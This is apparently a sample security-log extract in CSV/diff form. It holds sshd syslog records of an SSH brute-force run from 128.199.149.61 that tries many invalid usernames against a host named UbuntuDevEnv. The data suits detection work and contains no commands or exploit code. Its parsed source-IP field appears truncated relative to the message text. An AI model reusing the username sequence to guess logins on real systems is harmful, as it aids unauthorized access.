+19905,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:13:23,UbuntuDevEnv,2019-06-06 18:13:23,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 55122:11: Normal Shutdown, Thank you for playing [preauth]",10890,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,55122,,
+19906,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:13:23,UbuntuDevEnv,2019-06-06 18:13:23,auth,UbuntuDevEnv,info,Disconnected from invalid user sam 128.199.149.61 port 55122 [preauth],10890,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sam,128.199.149.6,55122,,
+19907,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:13:51,UbuntuDevEnv,2019-06-06 18:13:51,auth,UbuntuDevEnv,info,Invalid user lucy from 128.199.149.61 port 45386,10938,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,lucy,128.199.149.6,45386,,
+19908,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:13:51,UbuntuDevEnv,2019-06-06 18:13:51,auth,UbuntuDevEnv,info,Disconnected from invalid user lucy 128.199.149.61 port 45386 [preauth],10938,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,lucy,128.199.149.6,45386,,
+19909,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:13:51,UbuntuDevEnv,2019-06-06 18:13:51,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 45386:11: Normal Shutdown, Thank you for playing [preauth]",10938,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,45386,,
+19910,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:13:58,UbuntuDevEnv,2019-06-06 18:13:58,auth,UbuntuDevEnv,info,Invalid user maggot from 128.199.149.61 port 50012,10954,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,maggot,128.199.149.6,50012,,
+19911,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:13:58,UbuntuDevEnv,2019-06-06 18:13:58,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 50012:11: Normal Shutdown, Thank you for playing [preauth]",10954,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,50012,,
+19912,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:13:58,UbuntuDevEnv,2019-06-06 18:13:58,auth,UbuntuDevEnv,info,Disconnected from invalid user maggot 128.199.149.61 port 50012 [preauth],10954,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,maggot,128.199.149.6,50012,,
+19913,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:14:05,UbuntuDevEnv,2019-06-06 18:14:05,auth,UbuntuDevEnv,info,Invalid user alfred from 128.199.149.61 port 54640,10962,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,alfred,128.199.149.6,54640,,
+19914,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:14:05,UbuntuDevEnv,2019-06-06 18:14:05,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 54640:11: Normal Shutdown, Thank you for playing [preauth]",10962,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,54640,,
+19915,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:14:05,UbuntuDevEnv,2019-06-06 18:14:05,auth,UbuntuDevEnv,info,Disconnected from invalid user alfred 128.199.149.61 port 54640 [preauth],10962,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,alfred,128.199.149.6,54640,,
+19916,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:14:12,UbuntuDevEnv,2019-06-06 18:14:12,auth,UbuntuDevEnv,info,Invalid user alberto from 128.199.149.61 port 59270,10980,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,alberto,128.199.149.6,59270,,
+19917,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:14:12,UbuntuDevEnv,2019-06-06 18:14:12,auth,UbuntuDevEnv,info,Disconnected from invalid user alberto 128.199.149.61 port 59270 [preauth],10980,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,alberto,128.199.149.6,59270,,
+19918,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:14:12,UbuntuDevEnv,2019-06-06 18:14:12,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 59270:11: Normal Shutdown, Thank you for playing [preauth]",10980,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,59270,,
+19919,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:14:20,UbuntuDevEnv,2019-06-06 18:14:19,auth,UbuntuDevEnv,info,Invalid user alexia from 128.199.149.61 port 35648,10991,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,alexia,128.199.149.6,35648,,
+19920,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:14:20,UbuntuDevEnv,2019-06-06 18:14:19,auth,UbuntuDevEnv,info,Disconnected from invalid user alexia 128.199.149.61 port 35648 [preauth],10991,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,alexia,128.199.149.6,35648,,
+19921,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:14:20,UbuntuDevEnv,2019-06-06 18:14:19,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 35648:11: Normal Shutdown, Thank you for playing [preauth]",10991,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,35648,,
+19922,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:14:25,UbuntuDevEnv,2019-06-06 18:14:25,auth,UbuntuDevEnv,info,Invalid user alice from 128.199.149.61 port 40272,10997,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,alice,128.199.149.6,40272,,
+19923,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:14:26,UbuntuDevEnv,2019-06-06 18:14:25,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 40272:11: Normal Shutdown, Thank you for playing [preauth]",10997,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,40272,,
+19924,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:14:26,UbuntuDevEnv,2019-06-06 18:14:25,auth,UbuntuDevEnv,info,Disconnected from invalid user alice 128.199.149.61 port 40272 [preauth],10997,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,alice,128.199.149.6,40272,,
+19925,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:14:33,UbuntuDevEnv,2019-06-06 18:14:32,auth,UbuntuDevEnv,info,Invalid user mihai from 128.199.149.61 port 44896,11014,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mihai,128.199.149.6,44896,,
+19926,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:14:33,UbuntuDevEnv,2019-06-06 18:14:33,auth,UbuntuDevEnv,info,Disconnected from invalid user mihai 128.199.149.61 port 44896 [preauth],11014,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mihai,128.199.149.6,44896,,
+19927,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:14:33,UbuntuDevEnv,2019-06-06 18:14:33,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 44896:11: Normal Shutdown, Thank you for playing [preauth]",11014,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,44896,,
+19928,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:14:39,UbuntuDevEnv,2019-06-06 18:14:39,auth,UbuntuDevEnv,info,Invalid user aron from 128.199.149.61 port 49524,11020,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,aron,128.199.149.6,49524,,
+19929,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:14:39,UbuntuDevEnv,2019-06-06 18:14:39,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 49524:11: Normal Shutdown, Thank you for playing [preauth]",11020,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,49524,,
+19930,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:14:39,UbuntuDevEnv,2019-06-06 18:14:39,auth,UbuntuDevEnv,info,Disconnected from invalid user aron 128.199.149.61 port 49524 [preauth],11020,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,aron,128.199.149.6,49524,,
+19931,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:14:46,UbuntuDevEnv,2019-06-06 18:14:45,auth,UbuntuDevEnv,info,Invalid user dora from 128.199.149.61 port 54148,11031,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,dora,128.199.149.6,54148,,
+19932,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:14:46,UbuntuDevEnv,2019-06-06 18:14:46,auth,UbuntuDevEnv,info,Disconnected from invalid user dora 128.199.149.61 port 54148 [preauth],11031,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,dora,128.199.149.6,54148,,
+19933,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:14:46,UbuntuDevEnv,2019-06-06 18:14:46,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 54148:11: Normal Shutdown, Thank you for playing [preauth]",11031,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,54148,,
+19934,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:14:53,UbuntuDevEnv,2019-06-06 18:14:52,auth,UbuntuDevEnv,info,Invalid user duci from 128.199.149.61 port 58770,11045,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,duci,128.199.149.6,58770,,
+19935,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:14:53,UbuntuDevEnv,2019-06-06 18:14:52,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 58770:11: Normal Shutdown, Thank you for playing [preauth]",11045,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,58770,,
+19936,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:14:53,UbuntuDevEnv,2019-06-06 18:14:52,auth,UbuntuDevEnv,info,Disconnected from invalid user duci 128.199.149.61 port 58770 [preauth],11045,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,duci,128.199.149.6,58770,,
+19937,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:14:59,UbuntuDevEnv,2019-06-06 18:14:59,auth,UbuntuDevEnv,info,Invalid user dumy from 128.199.149.61 port 35164,11061,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,dumy,128.199.149.6,35164,,
+19938,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:15:00,UbuntuDevEnv,2019-06-06 18:14:59,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 35164:11: Normal Shutdown, Thank you for playing [preauth]",11061,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,35164,,
+19939,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:15:00,UbuntuDevEnv,2019-06-06 18:14:59,auth,UbuntuDevEnv,info,Disconnected from invalid user dumy 128.199.149.61 port 35164 [preauth],11061,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,dumy,128.199.149.6,35164,,
+19940,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:15:06,UbuntuDevEnv,2019-06-06 18:15:05,auth,UbuntuDevEnv,info,Invalid user dummy from 128.199.149.61 port 39782,11103,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,dummy,128.199.149.6,39782,,
+19941,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:15:06,UbuntuDevEnv,2019-06-06 18:15:05,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 39782:11: Normal Shutdown, Thank you for playing [preauth]",11103,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,39782,,
+19942,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:15:06,UbuntuDevEnv,2019-06-06 18:15:05,auth,UbuntuDevEnv,info,Disconnected from invalid user dummy 128.199.149.61 port 39782 [preauth],11103,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,dummy,128.199.149.6,39782,,
+19943,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:15:13,UbuntuDevEnv,2019-06-06 18:15:12,auth,UbuntuDevEnv,info,Invalid user edu from 128.199.149.61 port 44460,11126,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,edu,128.199.149.6,44460,,
+19944,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:15:13,UbuntuDevEnv,2019-06-06 18:15:13,auth,UbuntuDevEnv,info,Disconnected from invalid user edu 128.199.149.61 port 44460 [preauth],11126,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,edu,128.199.149.6,44460,,
+19945,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:15:13,UbuntuDevEnv,2019-06-06 18:15:13,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 44460:11: Normal Shutdown, Thank you for playing [preauth]",11126,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,44460,,
+19946,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:15:20,UbuntuDevEnv,2019-06-06 18:15:20,auth,UbuntuDevEnv,info,Invalid user elise from 128.199.149.61 port 49040,11138,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,elise,128.199.149.6,49040,,
+19947,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:15:20,UbuntuDevEnv,2019-06-06 18:15:20,auth,UbuntuDevEnv,info,Disconnected from invalid user elise 128.199.149.61 port 49040 [preauth],11138,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,elise,128.199.149.6,49040,,
+19948,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:15:20,UbuntuDevEnv,2019-06-06 18:15:20,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 49040:11: Normal Shutdown, Thank you for playing [preauth]",11138,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,49040,,
+19949,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:15:27,UbuntuDevEnv,2019-06-06 18:15:26,auth,UbuntuDevEnv,info,Invalid user eliana from 128.199.149.61 port 53656,11148,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,eliana,128.199.149.6,53656,,
+19950,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:15:27,UbuntuDevEnv,2019-06-06 18:15:26,auth,UbuntuDevEnv,info,Disconnected from invalid user eliana 128.199.149.61 port 53656 [preauth],11148,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,eliana,128.199.149.6,53656,,
+19951,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:15:27,UbuntuDevEnv,2019-06-06 18:15:26,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 53656:11: Normal Shutdown, Thank you for playing [preauth]",11148,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,53656,,
+19952,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:15:34,UbuntuDevEnv,2019-06-06 18:15:33,auth,UbuntuDevEnv,info,Invalid user element from 128.199.149.61 port 58278,11228,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,element,128.199.149.6,58278,,
+19953,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:15:34,UbuntuDevEnv,2019-06-06 18:15:33,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 58278:11: Normal Shutdown, Thank you for playing [preauth]",11228,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,58278,,
+19954,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:15:34,UbuntuDevEnv,2019-06-06 18:15:33,auth,UbuntuDevEnv,info,Disconnected from invalid user element 128.199.149.61 port 58278 [preauth],11228,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,element,128.199.149.6,58278,,
+19955,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:15:40,UbuntuDevEnv,2019-06-06 18:15:40,auth,UbuntuDevEnv,info,Invalid user ella from 128.199.149.61 port 34666,11234,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ella,128.199.149.6,34666,,
+19956,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:15:40,UbuntuDevEnv,2019-06-06 18:15:40,auth,UbuntuDevEnv,info,Disconnected from invalid user ella 128.199.149.61 port 34666 [preauth],11234,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ella,128.199.149.6,34666,,
+19957,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:15:40,UbuntuDevEnv,2019-06-06 18:15:40,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 34666:11: Normal Shutdown, Thank you for playing [preauth]",11234,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,34666,,
+19958,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:15:47,UbuntuDevEnv,2019-06-06 18:15:46,auth,UbuntuDevEnv,info,Invalid user ellen from 128.199.149.61 port 39292,11253,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ellen,128.199.149.6,39292,,
+19959,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:15:47,UbuntuDevEnv,2019-06-06 18:15:46,auth,UbuntuDevEnv,info,Disconnected from invalid user ellen 128.199.149.61 port 39292 [preauth],11253,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ellen,128.199.149.6,39292,,
+19960,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:15:47,UbuntuDevEnv,2019-06-06 18:15:46,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 39292:11: Normal Shutdown, Thank you for playing [preauth]",11253,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,39292,,
+19961,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:18:10,UbuntuDevEnv,2019-06-06 18:18:10,auth,UbuntuDevEnv,info,Invalid user musikbot from 128.199.149.61 port 51694,11532,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,musikbot,128.199.149.6,51694,,
+19962,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:18:11,UbuntuDevEnv,2019-06-06 18:18:10,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 51694:11: Normal Shutdown, Thank you for playing [preauth]",11532,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,51694,,
+19963,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:18:11,UbuntuDevEnv,2019-06-06 18:18:10,auth,UbuntuDevEnv,info,Disconnected from invalid user musikbot 128.199.149.61 port 51694 [preauth],11532,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,musikbot,128.199.149.6,51694,,
+19964,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:18:17,UbuntuDevEnv,2019-06-06 18:18:17,auth,UbuntuDevEnv,info,Invalid user radio from 128.199.149.61 port 56316,11553,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,radio,128.199.149.6,56316,,
